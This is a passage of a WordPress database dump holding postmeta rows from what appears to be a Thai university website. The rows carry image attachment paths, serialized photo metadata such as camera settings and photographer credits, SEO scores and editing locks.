(9759, 4332, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/64-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"64-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"64-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"64-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"64-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"64-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476813211\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9760, 4333, '_wp_attached_file', '2018/11/70-Arun-Roysri-copy.jpg'),
(9761, 4333, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/70-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"70-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"70-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"70-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"70-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"70-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476902852\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9762, 4334, '_wp_attached_file', '2018/11/72-Arun-Roysri-copy.jpg'),
(9763, 4334, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/72-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"72-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"72-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"72-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"72-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"72-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1478948057\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9764, 4335, '_wp_attached_file', '2018/11/73-Arun-Roysri-copy.jpg'),
(9765, 4335, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/73-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"73-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"73-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"73-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"73-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"73-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:11:\"ARUN ROISRI\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1481561705\";s:9:\"copyright\";s:11:\"ARUN ROISRI\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9766, 4336, '_wp_attached_file', '2018/11/74-Arun-Roysri-copy.jpg'),
(9767, 4336, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1198;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/74-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"74-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"74-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"74-Arun-Roysri-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"74-Arun-Roysri-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"74-Arun-Roysri-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D500\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1481552757\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"20\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9768, 4337, '_wp_attached_file', '2018/11/76-Arun-Roysri-copy.jpg'),
(9769, 4337, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/76-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"76-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"76-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"76-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"76-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"76-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477643398\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:3:\"135\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:8:\"0.003125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9770, 4338, '_wp_attached_file', '2018/11/77-Arun-Roysri-copy.jpg'),
(9771, 4338, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/77-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"77-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"77-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"77-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"77-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"77-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.4\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477592515\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:4:\"1000\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9772, 4339, '_wp_attached_file', '2018/11/81-Arun-Roysri-copy.jpg'),
(9773, 4339, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1198;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/81-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"81-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"81-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"81-Arun-Roysri-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"81-Arun-Roysri-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"81-Arun-Roysri-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D500\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1483219528\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"135\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9774, 4340, '_wp_attached_file', '2018/11/91-Arun-Roysri-copy.jpg'),
(9775, 4340, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/91-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"91-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"91-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"91-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"91-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"91-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477156814\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:3:\"135\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9776, 4341, '_edit_lock', '1542090468:3'),
(9777, 4341, '_edit_last', '3'),
(9778, 4341, '_hide_featured', NULL),
(9779, 4341, '_yoast_wpseo_content_score', '90'),
(9780, 3805, '_yoast_wpseo_content_score', '60'),
(9781, 4353, '_edit_lock', '1542002955:3'),
(9782, 4353, '_edit_last', '3'),
(9783, 4354, '_wp_attached_file', '2018/11/ประกาศ-รายชื่อผู้มีสิทธิ์สอบ-ธุรการ.pdf'),
(9787, 4353, '_hide_featured', NULL),
(9788, 4353, '_yoast_wpseo_content_score', '60'),
(9789, 4353, '_yoast_wpseo_primary_category', '3'),
(9790, 4353, '_wpas_done_all', '1'),
(9791, 4353, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575696114;s:7:\"payload\";a:0:{}}}'),
(9800, 1174, '_yoast_wpseo_content_score', '60'),
(9801, 4415, '_edit_lock', '1542037592:3'),
(9802, 4415, '_edit_last', '3'),
(9803, 4416, '_wp_attached_file', '2018/11/44822_201811121603.pdf'),
(9807, 4415, '_hide_featured', NULL),
(9808, 4415, '_yoast_wpseo_content_score', '60'),
(9809, 4415, '_yoast_wpseo_primary_category', '3'),
(9810, 4415, '_wpas_done_all', '1'),
(9811, 4415, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574923194;s:7:\"payload\";a:0:{}}}'),
(9819, 4425, '_wp_attached_file', '2018/10/2222.png'),
(9820, 4425, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:784;s:6:\"height\";i:164;s:4:\"file\";s:16:\"2018/10/2222.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"2222-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"2222-300x63.png\";s:5:\"width\";i:300;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"2222-768x161.png\";s:5:\"width\";i:768;s:6:\"height\";i:161;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"2222-400x84.png\";s:5:\"width\";i:400;s:6:\"height\";i:84;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9821, 4426, '_edit_lock', '1542093749:3'),
(9822, 4427, '_wp_attached_file', '2018/10/3333.png'),
(9823, 4427, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:779;s:6:\"height\";i:164;s:4:\"file\";s:16:\"2018/10/3333.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"3333-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"3333-300x63.png\";s:5:\"width\";i:300;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"3333-768x162.png\";s:5:\"width\";i:768;s:6:\"height\";i:162;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"3333-400x84.png\";s:5:\"width\";i:400;s:6:\"height\";i:84;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9826, 4431, '_wp_attached_file', '2018/10/55555.png'),
(9827, 4431, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:606;s:6:\"height\";i:165;s:4:\"file\";s:17:\"2018/10/55555.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"55555-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"55555-300x82.png\";s:5:\"width\";i:300;s:6:\"height\";i:82;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"55555-400x109.png\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9828, 4426, '_edit_last', '3'),
(9829, 4426, '_hide_featured', NULL),
(9830, 4426, '_yoast_wpseo_content_score', '90'),
(9831, 4437, '_wp_attached_file', '2018/11/1-Bundit-Chotsuwan-copy.jpg'),
(9832, 4437, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:754;s:4:\"file\";s:35:\"2018/11/1-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"1-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"1-Bundit-Chotsuwan-copy-300x189.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"1-Bundit-Chotsuwan-copy-768x483.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:483;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"1-Bundit-Chotsuwan-copy-1024x643.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:643;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:35:\"1-Bundit-Chotsuwan-copy-400x251.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476463600\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:6:\"0.0008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9833, 4438, '_wp_attached_file', '2018/11/6-Bundit-Chotsuwan-copy.jpg'),
(9834, 4438, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:35:\"2018/11/6-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"6-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"6-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"6-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"6-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:35:\"6-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477147125\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"17\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9835, 4439, '_wp_attached_file', '2018/11/7-Bundit-Chotsuwan-copy.jpg'),
(9836, 4439, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:35:\"2018/11/7-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"7-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"7-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"7-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"7-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:35:\"7-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1481524158\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"17\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9837, 4440, '_wp_attached_file', '2018/11/9-Bundit-Chotsuwan-copy.jpg'),
